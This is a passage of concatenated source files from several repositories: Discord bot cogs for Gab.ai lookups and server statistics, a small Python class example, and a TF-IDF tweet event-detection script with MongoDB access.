token["expires_in"] + datetime.now().timestamp()
)
async def get_header(self):
access_token = await self.config.api_token.token.access_token()
return {"Authorization": "Bearer {}".format(access_token)}
async def check_rate_limit(self):
"""Current rate limit is 60 calls per minute"""
time_now = int(datetime.now().timestamp())
if self.rate_limit_remaining == 60:
self.rate_limit_time = int(datetime.now().timestamp())
self.rate_limit_remaining -= 1
return
if self.rate_limit_remaining != 0:
self.rate_limit_remaining -= 1
return
else:
if time_now > (self.rate_limit_time + 60):
self.rate_limit_remaining = 59
self.rate_limit_time = time_now
else:
await asyncio.sleep(self.rate_limit_time + 60 - time_now)
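    # Illustrative example of the back-off above: if the current 60-call window
    # started at t = 100 s and the budget is exhausted, a call arriving at
    # t = 130 s sleeps for 100 + 60 - 130 = 30 seconds before proceeding.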
async def get_gab_response(self, url, params=None):
await self.check_rate_limit()
header = await self.get_header()
async with self.session.get(BASE_URL + url, params=params, headers=header) as resp:
response = await resp.json()
if "status" in response:
raise NotFoundError(response["message"])
else:
return response
async def make_user_embed(self, user: GabUser):
url = "https://gab.ai/{}".format(user.username)
em = discord.Embed(description=user.bio[:1990], title=user.name, colour=int("4bd079", 16))
em.set_author(name=user.username, url=url, icon_url=user.picture_url_full)
em.set_thumbnail(url=user.picture_url_full)
em.add_field(name="Followers", value=user.follower_count)
em.add_field(name="Following", value=user.following_count)
em.add_field(name="Score", value=user.score)
acknowledgements = ""
if user.is_pro:
acknowledgements += "Pro, "
if user.verified:
acknowledgements += "Verified, "
if user.is_donor:
acknowledgements += "Donor, "
if user.is_investor:
acknowledgements += "Investor, "
if acknowledgements != "":
em.add_field(name="Acknowledgements", value=acknowledgements[:-2])
# em.set_image(url=user.cover_url)
return em
async def make_post_embed(self, post: dict):
username = post["actuser"]["username"]
post_id = post["post"]["id"]
url = "https://gab.ai/{}/posts/{}".format(username, post_id)
timestamp = datetime.strptime(post["post"]["created_at"], "%Y-%m-%dT%H:%M:%S+00:00")
attachment = post["post"]["attachment"]["type"]
colour = int("4bd079", 16)
likes = post["post"]["like_count"]
replies = post["post"]["reply_count"]
em = discord.Embed(description=post["post"]["body"], timestamp=timestamp, colour=colour)
if attachment is not None:
if attachment != "media":
em.set_image(url=post["post"]["attachment"]["value"])
else:
em.set_image(url=post["post"]["attachment"]["value"][0]["url_full"])
em.set_author(
name=post["actuser"]["username"], url=url, icon_url=post["actuser"]["picture_url"]
)
em.set_footer(text="{} Likes | {} Replies | Created at".format(likes, replies))
return em
async def gab_menu(
self,
ctx: commands.Context,
post_list: list,
message: discord.Message = None,
page=0,
timeout: int = 30,
):
"""menu control logic for this taken from
https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
post = post_list[page]
if ctx.channel.permissions_for(ctx.me).embed_links:
em = await self.make_post_embed(post)
else:
await ctx.send("I need embed_links permission to use this command.")
return
if not message:
message = await ctx.send(embed=em)
await message.add_reaction("⬅")
await message.add_reaction("❌")
await message.add_reaction("➡")
else:
# message edits don't return the message object anymore lol
await message.edit(embed=em)
check = (
lambda react, user: user == ctx.message.author
and react.emoji in ["➡", "⬅", "❌"]
and react.message.id == message.id
)
try:
react, user = await ctx.bot.wait_for("reaction_add", check=check, timeout=timeout)
except asyncio.TimeoutError:
await message.remove_reaction("⬅", ctx.me)
await message.remove_reaction("❌", ctx.me)
await message.remove_reaction("➡", ctx.me)
return None
else:
if react.emoji == "➡":
next_page = 0
if page == len(post_list) - 1:
next_page = 0 # Loop around to the first item
else:
next_page = page + 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("➡", ctx.message.author)
return await self.gab_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react.emoji == "⬅":
next_page = 0
if page == 0:
next_page = len(post_list) - 1 # Loop around to the last item
else:
next_page = page - 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("⬅", ctx.message.author)
return await self.gab_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
else:
return await message.delete()
@gab.command()
async def feed(self, ctx, username: str, before_date: str = None):
"""
Gets a users feed from gab.ai before a specified date
before_date must be in format DD-MM-YYYY
"""
await ctx.trigger_typing()
if before_date is None:
            before_date = datetime.now().strftime("%Y-%m-%dT%H:%M:%S%z")
else:
before_date = datetime.strptime(before_date, "%d-%m-%Y").strftime(
"%Y-%m-%dT%H:%M:%S+00:00"
)
try:
feed_info = await self.get_gab_response(
f"users/{username}/feed/", {"before": before_date}
)
except NotFoundError as e:
await ctx.send("{} {}".format(username, e))
return
await self.gab_menu(ctx, feed_info["data"])
@gab.command()
async def user(self, ctx, username: str):
"""
Get user information from gab.ai
"""
await ctx.trigger_typing()
try:
user_info = await self.get_gab_response(f"users/{username}")
except NotFoundError as e:
await ctx.send("{} {}".format(username, e))
return
user = GabUser.from_json(user_info)
em = await self.make_user_embed(user)
await ctx.send(embed=em)
@gab.command()
@checks.is_owner()
async def token(self, ctx, client_id: str, client_secret: str):
"""
Provide your client_id and client_secret
1. go to https://gab.ai/settings/clients then Developer Apps
2. Select Create app
3. Fillout the form and set the redirect url to https://localhost
4. Provide the client_id and client_secret
5. The bot will provide a link and ask for the code
6. post everything after `?code=` in discord
"""
await self.config.api_token.client_id.set(client_id)
await self.config.api_token.client_secret.set(client_secret)
url = f"https://api.gab.com/oauth/authorize?response_type=code&client_id={client_id}&redirect_uri=https://localhost&scope=%20read%20engage-user%20engage-post%20write-post%20notifications"
await ctx.send(
"Please go to the following url and provide the code supplied: {}".format(url)
)
check = lambda m: m.author.id == ctx.message.author.id
code = await self.bot.wait_for("message", check=check)
params = {
"grant_type": "authorization_code",
"code": code.content,
"client_id": client_id,
"client_secret": client_secret,
"redirect_uri": "https://localhost",
}
async with self.session.post("https://api.gab.com/oauth/token", json=params) as resp:
token = await resp.json()
if "error" in token:
await ctx.send(token["message"] + "\n\nMaybe try again/")
return
await self.config.api_token.token.set(token)
await self.config.api_token.refresh_time.set(
token["expires_in"] + datetime.now().timestamp()
)
await ctx.send("API Tokens set!")
def __unload(self):
self.bot.loop.create_task(self.session.close())
```
#### File: Trusty-cogs/serverstats/serverstats.py
```python
from random import choice, randint
import discord
import asyncio
import unidecode
import datetime
import aiohttp
import re
import itertools
from io import BytesIO
from redbot.core import commands
from redbot.core import checks, bank, Config
from redbot.core.i18n import Translator, cog_i18n
from redbot.core.utils.chat_formatting import pagify, box
from redbot.core.utils.menus import DEFAULT_CONTROLS, menu
from redbot.core.utils.predicates import MessagePredicate
from discord.ext.commands.converter import IDConverter
from discord.ext.commands.converter import _get_from_guilds
from discord.ext.commands.errors import BadArgument
from typing import Union, Optional
_ = Translator("ServerStats", __file__)
class FuzzyMember(IDConverter):
"""
This will accept user ID's, mentions, and perform a fuzzy search for
members within the guild and return a list of member objects
matching partial names
Guidance code on how to do this from:
https://github.com/Rapptz/discord.py/blob/rewrite/discord/ext/commands/converter.py#L85
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/develop/redbot/cogs/mod/mod.py#L24
"""
async def convert(self, ctx, argument):
bot = ctx.bot
match = self._get_id_match(argument) or re.match(r"<@!?([0-9]+)>$", argument)
guild = ctx.guild
result = []
if match is None:
# Not a mention
if guild:
for m in guild.members:
if argument.lower() in unidecode.unidecode(m.display_name.lower()):
# display_name so we can get the nick of the user first
# without being NoneType and then check username if that matches
# what we're expecting
result.append(m)
continue
if argument.lower() in unidecode.unidecode(m.name.lower()):
result.append(m)
continue
else:
user_id = int(match.group(1))
if guild:
result.append(guild.get_member(user_id))
else:
result.append(_get_from_guilds(bot, "get_member", user_id))
        if not result:
raise BadArgument('Member "{}" not found'.format(argument))
return result
class GuildConverter(IDConverter):
"""
This is a guild converter for fuzzy guild names which is used throughout
this cog to search for guilds by part of their name and will also
accept guild ID's
Guidance code on how to do this from:
https://github.com/Rapptz/discord.py/blob/rewrite/discord/ext/commands/converter.py#L85
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/develop/redbot/cogs/mod/mod.py#L24
"""
async def convert(self, ctx, argument):
bot = ctx.bot
match = self._get_id_match(argument)
result = None
if ctx.author.id != ctx.bot.owner_id:
# Don't need to be snooping other guilds unless we're
# the bot owner
raise BadArgument(_("That option is only available for the bot owner."))
if match is None:
# Not a mention
for g in bot.guilds:
if argument.lower() in g.name.lower():
# display_name so we can get the nick of the user first
# without being NoneType and then check username if that matches
# what we're expecting
result = g
else:
guild_id = int(match.group(1))
result = bot.get_guild(guild_id)
if result is None:
raise BadArgument('Guild "{}" not found'.format(argument))
return result
@cog_i18n(_)
class ServerStats(getattr(commands, "Cog", object)):
"""
Gather useful information about servers the bot is in
A lot of commands are bot owner only
"""
def __init__(self, bot):
self.bot = bot
default_global = {"join_channel": None}
self.config = Config.get_conf(self, 54853421465543)
self.config.register_global(**default_global)
async def on_guild_join(self, guild):
"""Build and send a message containing serverinfo when the bot joins a new server"""
channel_id = await self.config.join_channel()
if channel_id is None:
return
channel = self.bot.get_channel(channel_id)
em = await self.guild_embed(guild)
em.title = "{bot} has joined {server}".format(bot=channel.guild.me.name, server=guild.name)
await channel.send(embed=em)
async def guild_embed(self, guild):
"""
Builds the guild embed information used throughout the cog
"""
def check_feature(feature):
return "\N{WHITE HEAVY CHECK MARK}" if feature in guild.features else "\N{CROSS MARK}"
total_users = len(guild.members)
        humans = len([a for a in guild.members if not a.bot])
        bots = len([a for a in guild.members if a.bot])
        text_channels = len(guild.text_channels)
        voice_channels = len(guild.voice_channels)
passed = (datetime.datetime.utcnow() - guild.created_at).days
created_at = _("Created on : {since}").format(
since=guild.created_at.strftime("%d %b %Y %H:%M")
)
try:
joined_at = guild.me.joined_at
except:
joined_at = datetime.datetime.utcnow()
bot_joined = joined_at.strftime("%d %b %Y %H:%M:%S")
since_joined = (datetime.datetime.utcnow() - joined_at).days
joined_on = _(
"Joined on : {bot_join}"
).format(bot_join=bot_joined)
em = discord.Embed(description=f"{created_at}\n{joined_on}")
em.add_field(
name=_("Members :"),
value=_(
"Total users : {total}\nHumans : {hum}\nBots : {bots}"
).format(
total=total_users,
hum=humans,
bots=bots,
),
)
em.add_field(
name=_("Utility :"),
value=_(
"Owner : {owner}\nServer ID : {id}"
).format(
owner=guild.owner,
id=guild.id,
),
)
em.title = guild.name
if guild.icon_url:
em.set_thumbnail(url=guild.icon_url)
else:
em.set_thumbnail(
url="https://cdn.discordapp.com/attachments/494975386334134273/529843761635786754/Discord-Logo-Black.png"
)
return em
async def on_guild_remove(self, guild):
"""Build and send a message containing serverinfo when the bot leaves a server"""
channel_id = await self.config.join_channel()
if channel_id is None:
return
channel = self.bot.get_channel(channel_id)
em = await self.guild_embed(guild)
em.title = "{bot} has left {server}".format(bot=channel.guild.me.name, server=guild.name)
await channel.send(embed=em)
async def ask_for_invite(self, ctx):
"""
Ask the user to provide an invite link
if reinvite is True
"""
check = lambda m: m.author == ctx.message.author
msg_send = _(
"Please provide a reinvite link/message.\n" "Type `exit` for no invite link/message."
)
invite_check = await ctx.send(msg_send)
try:
msg = await ctx.bot.wait_for("message", check=check, timeout=30)
except asyncio.TimeoutError:
            await invite_check.edit(content=_("I guess not."))
return None
if "exit" in msg.content:
return None
else:
return msg.content
async def get_members_since(self, ctx, days: int, role: discord.Role):
now = datetime.datetime.utcnow()
after = now - datetime.timedelta(days=days)
if role is None:
member_list = [m for m in ctx.guild.members if m.top_role < ctx.me.top_role]
else:
member_list = [m for m in role.members if m.top_role < ctx.me.top_role]
user_list = []
for channel in ctx.guild.text_channels:
if not channel.permissions_for(ctx.me).read_message_history:
continue
async for message in channel.history(limit=None, after=after):
if message.author in member_list:
member_list.remove(message.author)
return member_list
@commands.command()
@checks.is_owner()
@commands.bot_has_permissions(embed_links=True)
async def setguildjoin(self, ctx, channel: discord.TextChannel = None):
"""
Set a channel to see new servers the bot is joining
"""
if channel is None:
channel = ctx.message.channel
await self.config.join_channel.set(channel.id)
msg = _("Posting new servers and left servers in ") + channel.mention
await ctx.send(msg)
@commands.command()
@checks.is_owner()
async def removeguildjoin(self, ctx):
"""
Stop bots join/leave server messages
"""
await self.config.join_channel.set(None)
await ctx.send(_("No longer posting joined or left servers."))
async def guild_menu(
self, ctx, post_list: list, message: discord.Message = None, page=0, timeout: int = 30
):
"""menu control logic for this taken from
https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
guild = post_list[page]
em = await self.guild_embed(guild)
if not message:
message = await ctx.send(embed=em)
await message.add_reaction("⬅")
await message.add_reaction("❌")
await message.add_reaction("➡")
await message.add_reaction("📤")
await message.add_reaction("📥")
else:
# message edits don't return the message object anymore lol
await message.edit(embed=em)
check = (
lambda react, user: user == ctx.message.author
and react.emoji in ["➡", "⬅", "❌", "\N{OUTBOX TRAY}", "\N{INBOX TRAY}"]
and react.message.id == message.id
)
try:
react, user = await self.bot.wait_for("reaction_add", check=check, timeout=timeout)
except asyncio.TimeoutError:
await message.remove_reaction("⬅", ctx.me)
await message.remove_reaction("❌", ctx.me)
await message.remove_reaction("➡", ctx.me)
await message.remove_reaction("\N{INBOX TRAY}", ctx.me)
await message.remove_reaction("\N{OUTBOX TRAY}", ctx.me)
return None
else:
if react.emoji == "➡":
next_page = 0
if page == len(post_list) - 1:
next_page = 0 # Loop around to the first item
else:
next_page = page + 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("➡", ctx.message.author)
return await self.guild_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react.emoji == "⬅":
next_page = 0
if page == 0:
next_page = len(post_list) - 1 # Loop around to the last item
else:
next_page = page - 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("⬅", ctx.message.author)
return await self.guild_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react.emoji == "\N{OUTBOX TRAY}":
try:
await self.confirm_leave_guild(ctx, guild)
except:
pass
elif react.emoji == "\N{INBOX TRAY}":
invite = await self.get_guild_invite(guild)
if invite:
await ctx.send(str(invite))
else:
await ctx.send(
_("I cannot find or create an invite for `{guild}`").format(
guild=guild.name
)
)
else:
return await message.delete()
@staticmethod
async def confirm_leave_guild(ctx, guild):
await ctx.send(
_("Are you sure you want to leave {guild}? (reply yes or no)").format(guild=guild.name)
)
pred = MessagePredicate.yes_or_no(ctx)
await ctx.bot.wait_for("message", check=pred)
if pred.result is True:
try:
await ctx.send(_("Leaving {guild}.").format(guild=guild.name))
await guild.leave()
except:
await ctx.send(_("I couldn't leave {guild}.").format(guild=guild.name))
else:
await ctx.send(_("Okay, not leaving {guild}.").format(guild=guild.name))
@staticmethod
async def get_guild_invite(guild: discord.Guild, max_age: int = 86400):
"""Handles the reinvite logic for getting an invite
to send the newly unbanned user
:returns: :class:`Invite`"""
my_perms: discord.Permissions = guild.me.guild_permissions
if my_perms.manage_guild or my_perms.administrator:
if "VANITY_URL" in guild.features:
# guild has a vanity url so use it as the one to send
return await guild.vanity_invite()
invites = await guild.invites()
else:
invites = []
for inv in invites: # Loop through the invites for the guild
if not (inv.max_uses or inv.max_age or inv.temporary):
# Invite is for the guild's default channel,
# has unlimited uses, doesn't expire, and
# doesn't grant temporary membership
# (i.e. they won't be kicked on disconnect)
return inv
else: # No existing invite found that is valid
channels_and_perms = zip(
guild.text_channels, map(guild.me.permissions_in, guild.text_channels)
)
channel = next(
(channel for channel, perms in channels_and_perms if perms.create_instant_invite),
None,
)
if channel is None:
return
try:
# Create invite that expires after max_age
return await channel.create_invite(max_age=max_age)
except discord.HTTPException:
return
@commands.command()
@checks.is_owner()
@commands.bot_has_permissions(embed_links=True)
async def getguild(self, ctx, *, guild: GuildConverter = None):
"""
Display info about servers the bot is on
`guild_name` can be either the server ID or partial name
"""
page = ctx.bot.guilds.index(ctx.guild)
if guild or await ctx.bot.is_owner(ctx.author):
page = ctx.bot.guilds.index(guild) if guild else page
await self.guild_menu(ctx, ctx.bot.guilds, None, page)
else:
await ctx.send(embed=await self.guild_embed(ctx.guild))
``` |
{
"source": "JinTang96/cv",
"score": 4
} |
#### File: essential/jinpackage/class_people.py
```python
class People:
# default constructor
def __init__(self, name):
self.name = name
def self_intro(self):
print(f"My name is {self.name}.")
def greet(self):
print("Good day everyone.")
```
#### File: essential/jinpackage/count.py
```python
def count(n):
print([i for i in range(1,n+1)])
``` |
{
"source": "Jin-Tao-208/web_science_coursework",
"score": 3
} |
#### File: Jin-Tao-208/web_science_coursework/event.py
```python
import time
import json
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
import re
import math
import numpy as np
doc_set = []
bol = False
count = 0
time_set = []
id_set = []
geo_set = []
location_set = []
noPlace_set = []
count21 = 0
with open('./original_data.json', 'r', encoding='utf-8')as f:
try:
while True:
line = f.readline()
if line:
d = json.loads(line)
if not d["retweet"]:
doc_set.append(d['text'])
# print(doc_set)
# time.sleep(1)
time_set.append(d['date'])
# print(time_set)
# time.sleep(1)
id_set.append(d['_id'])
# print(id_set)
# time.sleep(1)
geo_set.append(d['coordinates'])
# print(geo_set)
# time.sleep(1)
location_set.append(d['location'])
# print(location_set)
# time.sleep(1)
else:
break
except Exception as e:
print(e)
print("start Execute a tfidf process:")
eTimeStart = time.time()
# for x in range(0, len(result)):
# doc_set.append(result[x]['text'])
# time_set.append(result[x]['date'])
# id_set.append(result[x]['_id'])
# geo_set.append(result[x]['coordinates'])
# location_set.append(result[x]['location'])
tokenizer = RegexpTokenizer(r'\w+')
en_stop = get_stop_words('en')
k = doc_set
rekc = []
text1 = []
for i in k:
raw = i.lower()
raw = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '', raw, flags=re.MULTILINE)
# tokens = raw.split(" ")
tokens = tokenizer.tokenize(raw)
stopped_tokens = [i for i in tokens if not i in en_stop]
if len(stopped_tokens) == 0:
        stopped_tokens = ['emptytweet']
# print(stopped_tokens)
text1.append(stopped_tokens)
wordSet = []
wordSet1 = []
def cosineSim(sentence1, sentence2):
seg1 = sentence1
seg2 = sentence2
word_list = list(set([word for word in seg1 + seg2]))
word_count_vec_1 = []
word_count_vec_2 = []
for word in word_list:
word_count_vec_1.append(seg1.count(word))
word_count_vec_2.append(seg2.count(word))
vec_1 = np.array(word_count_vec_1)
vec_2 = np.array(word_count_vec_2)
num = vec_1.dot(vec_2.T)
denom = np.linalg.norm(vec_1) * np.linalg.norm(vec_2)
cos = num / denom
sim = 0.5 + 0.5 * cos
return sim
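# Worked example (illustrative tokens): for seg1 = ['storm', 'glasgow'] and
# seg2 = ['glasgow', 'rain'] the shared vocabulary has 3 words, the count
# vectors are [1, 1, 0] and [0, 1, 1], so cos = 1 / (sqrt(2) * sqrt(2)) = 0.5
# and the returned similarity is 0.5 + 0.5 * 0.5 = 0.75.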
for i in text1:
wordSet = list(set(wordSet).union(set(i)))
for i in range(0, len(text1)):
wordSet1.append(dict.fromkeys(wordSet, 0))
for sentence in range(0, len(text1)):
for word in text1[sentence]:
wordSet1[sentence][word] += 1
def computeTF(wordDict, bow):
tfDict = {}
bowCount = len(bow)
for word, count in wordDict.items():
tfDict[word] = count / float(bowCount)
return tfDict
tfresult = []
for x in range(0, len(text1)):
x = computeTF(wordSet1[x], text1[x])
tfresult.append(x)
def computeIDF(docList):
idfDict = {}
N = len(docList)
idfDict = dict.fromkeys(docList[0].keys(), 0)
for doc in docList:
for word, val in doc.items():
if val > 0:
idfDict[word] += 1
for word, val in idfDict.items():
idfDict[word] = math.log10(N / float(val))
return idfDict
idfresult = computeIDF(wordSet1)
def computeTFIDF(tfBow, idfs, cId):
tfidf = []
for word, val in tfBow.items():
tfidfInfo = []
tfidfInfo.append(word)
tfidfInfo.append([val * idfs[word], id_set[cId], time_set[cId], geo_set[cId], location_set[cId]])
tfidf.append(tfidfInfo)
return tfidf
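# Worked example (illustrative numbers): a term occurring once in a 10-token
# tweet has tf = 0.1; if it appears in 5 of 1000 tweets, idf = log10(1000 / 5)
# ~= 2.3, giving a tf-idf weight of about 0.23. computeTFIDF() pairs each weight
# with the tweet's id, timestamp and geo fields for the clustering step below.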
tfidfResult = []
# for x in range(0, len(text1)):
# tfidfResult.append(computeTFIDF(tfresult[x], idfresult, x))
tfidfTime = time.time()
print("tf-idf spent time %.2f sec" % (tfidfTime - eTimeStart))
print("starting events find......")
worthResult = []
for x in range(0, len(text1)):
worthGroup = computeTFIDF(tfresult[x], idfresult, x)
worthGroupInfo = []
for i in range(0, len(worthGroup)):
if worthGroup[i][1][0] != 0:
columGroup = []
columGroup.append(worthGroup[i][0])
columGroup.append(worthGroup[i][1])
worthGroupInfo.append(columGroup)
worthResult.append(worthGroupInfo)
termTweets = []
count1 = 0
maktag = 0
count9 = 0
loopTimes = 0
count10 = 0
specicaial = []
# Calculation of events
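# Outline of the clustering loop below (one iteration per tweet):
#   1. keep the tweet's top-10 tf-idf terms as its representation;
#   2. compare it, via cosine similarity, against the 10 most recent clusters;
#   3. above the 0.6 threshold, add the tweet to the best-matching cluster
#      (evicting the oldest entry once a cluster holds more than 24 tweets)
#      and merge near-duplicate "fragment" clusters (threshold 0.6 + 0.07);
#   4. otherwise start a new cluster, and once the table reaches its maximum
#      length of 25, overwrite the slot of an existing small cluster.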
for x in worthResult:
topV = []
# Fetch the TF-IDF values of the top 10
x.sort(key=lambda sublist: sublist[1][0], reverse=True)
if len(x) <= 10:
for i in x:
topV.append(i)
else:
topV = x[0:10]
    # Store the first tweet's top terms directly as the first event cluster
if count1 == 0:
timeMoment = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets.append([topV[0][0], [topV], timeMoment, count1])
count1 += 1
else:
setV1 = []
        # Take the 10 most recent event clusters to build the inverted index
termTweets.sort(key=lambda sublist: sublist[2], reverse=True)
marke = 0
for nsh in termTweets:
nsh[3] = marke
marke += 1
kid = 0
if len(termTweets) < 10:
for ki in termTweets:
setV1.append(ki)
else:
setV1 = termTweets[0:10]
        # Compare against the inverted index and find the most similar cluster by cosine similarity
textA = []
for i in topV:
textA.append(i[0])
maxSim = 0
count3 = 0
for j in range(0, len(setV1)):
for i in setV1[j][1]:
for imp in i:
textB = []
for textlen in imp:
textB.append(textlen[0])
tempSim = cosineSim(textA, textB)
if tempSim > maxSim:
maxSim = tempSim
count3 += 1
# threshold 0.6. based on the findings from the related works
# (<NAME>, 2015, <NAME>, 2010)
if maxSim > 0.6:
setV2 = []
qid = 0
# mark1 = []
            # First collect the clusters that contain the similar terms, then pad
            # with the most recent clusters to build a top-10 candidate set
for j in topV:
count4 = 0
for i in termTweets:
for k in i[1]:
for n in k:
for m in n:
if j[0] == m[0]:
setV2.append(i)
# mark1.append(count4)
break
count4 += 1
if len(setV2) < 10:
if len(termTweets) + len(setV2) > 10:
for ki in termTweets[0:(10 - len(setV2))]:
setV2.append(ki)
else:
for kj in termTweets:
setV2.append(kj)
else:
setV2 = setV2[0:10]
            # Collect the fragment ("shard") clusters that should be merged into one event
fragVector = []
maxSim1 = 0
count2 = 0
for j in setV2:
avgSim1 = 0
for ils in j[1]:
if len(j[1]) > 0:
textC = []
for imp1 in ils:
for imp2 in imp1:
textC.append(imp2[0])
avgSim1 += cosineSim(textA, textC)
print(len(j[1]))
if len(j[1]) > 0:
tempSim1 = avgSim1 / len(j[1])
# Calculate the centroid of mass
if avgSim1 > maxSim1:
maxSim1 = avgSim1
kid = j[3]
                    # Threshold for fragment (shard) clusters
if tempSim1 >= (0.6 + 0.07):
fragVector.append(j)
count2 += 1
if maxSim1 > 0.6:
# Treatment after exceeding the maximum Q value
if len(termTweets[kid][1]) > 24:
minTimeMark = termTweets[kid][2]
specicaial.append(len(termTweets[kid][1]))
specicaial.append(termTweets[kid][1])
markid = 0
count10 += 1
# Find the earliest event and delete it
for y in termTweets:
if y[3] == kid:
for ny in y[1]:
count6 = 0
count7 = 0
for ny1 in ny[0]:
if count6 == 1:
count5 = 0
for ny2 in ny1:
if count5 == 1:
tempTime = time.mktime(
time.strptime(ny2[2], "%a %b %d %H:%M:%S +0000 %Y"))
if tempTime < minTimeMark:
minTimeMark = tempTime
markid = count7
break
count5 += 1
count6 += 1
break
count7 += 1
termTweets[kid][1][markid] = [topV]
avgTime = 0
# Recalculate the average time
for y in termTweets:
if y[3] == kid:
for ny in y[1]:
count6 = 0
for ny1 in ny[0]:
if count6 == 1:
count5 = 0
for ny2 in ny1:
if count5 == 1:
avgTime += time.mktime(
time.strptime(ny2[2], "%a %b %d %H:%M:%S +0000 %Y"))
break
count5 += 1
count6 += 1
break
termTweets[kid][2] = int(avgTime / len(termTweets[kid][1]))
                # Merge fragment clusters that describe the same event
if len(fragVector) > 1:
groupFragNum = []
groupFragUn = []
for fk in range(0, len(fragVector)):
for fk1 in range(fk + 1, len(fragVector)):
groupFragUn = fragVector[fk][1] + fragVector[fk1][1]
anum = fragVector[fk1][3]
del termTweets[anum:anum + 1]
bnum = fragVector[0][3]
termTweets[bnum][1] = groupFragUn[0:int(len(groupFragUn) / len(fragVector))]
maktag = 0
else:
                    # Add the new tweet's terms to the most similar event cluster
termTweets[kid][1].append([x])
avgTime1 = 0
count9 += 1
for y in termTweets:
if y[3] == kid:
for ny in y[1]:
count6 = 0
for ny1 in ny[0]:
if count6 < 1:
count5 = 0
for ny2 in ny1:
if count5 == 1:
avgTime1 += time.mktime(
time.strptime(ny2[2], "%a %b %d %H:%M:%S +0000 %Y"))
break
count5 += 1
count6 += 1
break
termTweets[kid][2] = int(avgTime1 / len(termTweets[kid][1]))
else:
# Delete the earliest event after exceeding the table length E
if (len(termTweets) <= 25) & (maktag == 0):
timeMoment4 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets.append([topV[0][0], [[topV]], timeMoment4, count1])
count1 += 1
if len(termTweets) == 25:
maktag += 1
elif maktag > 0:
avgLen1 = 0
for item in termTweets:
avgLen1 += len(item[1])
avgLen1 = avgLen1 / len(termTweets)
# print("avglen:", avgLen1)
minLen2 = avgLen1
for iem in termTweets:
if len(iem[1]) < minLen2:
minLen2 = len(iem[1])
termTweets.sort(key=lambda sublist: sublist[2], reverse=True)
for item1 in termTweets:
if len(item1[1]) == minLen2:
timeMoment3 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets[0] = [topV[0][0], [[topV]], timeMoment3, 0]
break
# Delete the earliest event after exceeding the table length E
else:
if (len(termTweets) <= 25) & (maktag == 0):
timeMoment2 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets.append([topV[0][0], [[topV]], timeMoment2, count1])
count1 += 1
if len(termTweets) == 25:
maktag += 1
elif maktag > 0:
avgLen = 0
for item in termTweets:
avgLen += len(item[1])
avgLen = avgLen / len(termTweets)
# print("avglen:", avgLen)
minLen1 = avgLen
for iem in termTweets:
if len(iem[1]) < minLen1:
minLen1 = len(iem[1])
termTweets.sort(key=lambda sublist: sublist[2], reverse=True)
for item1 in termTweets:
if len(item1[1]) == minLen1:
timeMoment2 = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets[0] = [topV[0][0], [[topV]], timeMoment2, 0]
break
loopTimes += 1
for x in termTweets:
print(x)
print(len(x[1]))
# print(len(termTweets))
# print(count9)
# print(count10)
# print(specicaial)
finalR = []
count22 = 0
count23 = 0
count24 = 0
count26 = 0
for x in termTweets:
if len(x[1]) > 10:
count26 += 1
groupFinalR = []
for i in x[1]:
for j in i:
groupFinalR.append(j[0][1][2])
count25 = 0
for xn in j:
if count25 < 1:
if xn[1][3]:
count22 += 1
if xn[1][4]:
count23 += 1
if (xn[1][3] is None) & (xn[1][4] is None):
count24 += 1
count25 += 1
finalR.append(groupFinalR)
print("total clusters:", len(doc_set))
print("total time spent %.2f sec" % (time.time() - eTimeStart))
print("geo-coordination tag:", count22)
print("location tag:", count23)
print("without any geo tag tag:", count24)
print("events num:", count26)
```
#### File: Jin-Tao-208/web_science_coursework/eventsDetect.py
```python
from datetime import datetime
from DateInfo import DateInfo
from pymongo import MongoClient
# import time
client = MongoClient('127.0.0.1', 27017)  # connect to the local MongoDB instance
dbName = "TwitterDump" # set-up a MongoDatabase
db = client[dbName]
collName = 'colTest1' # here we create a collection
collection = db[collName] # This is for the Collection put in the DB
bol = False
result = collection.find({"retweet": bol})
class EventSummaryExtractor(object):
def __init__(self):
# self.DEF_INFILENAME = "ows.json"
self.CATEGORIES = {}
self.twittersdm = "%a %b %d %H:%M:%S Z %Y"
self.dayhoursdm = "%Y-%b-%d:%H"
self.daysdm = "%b/%d/%Y"
self.hoursdm = "%H"
def initialize_categories(self):
self.CATEGORIES["People"] = ["protesters", "people"]
self.CATEGORIES["Police"] = ["police", "cops", "nypd", "raid"]
self.CATEGORIES["Media"] = ["press", "news", "media"]
self.CATEGORIES["Location"] = ["nyc", "zucotti", "park"]
self.CATEGORIES["Judiciary"] = ["judge", "eviction", "order", "court"]
def extract_category_trends(self, fp):
"""
        :param fp: iterable of tweet records (as built in __main__ below)
:return:
"""
result = {}
temp = ""
catkeys = self.CATEGORIES.keys()
datecount = {}
        # Iterate over the tweet records and extract their timestamps
for temp in fp:
d = ""
# jobj = fp[3]
# time = jobj[7]
# d = datetime.fromtimestamp(time / 1000)
# if "created_at" in jobj:
# time = ""
# time = jobj["created_at"]
# if not time:
# continue
# else:
# d = datetime.strptime(time, self.twittersdm)
# elif "timestamp" in jobj:
# time = jobj["timestamp"]
# d = datetime.fromtimestamp(time / 1000)
time = temp[7]
d = datetime.fromtimestamp(time)
datestr = d.strftime(self.dayhoursdm)
text = temp[3]
# Assign it to the category the tweets belong to
for key in catkeys:
                words = self.CATEGORIES[key]
for word in words:
if word.lower() in text:
categorycount = {}
if datestr in datecount:
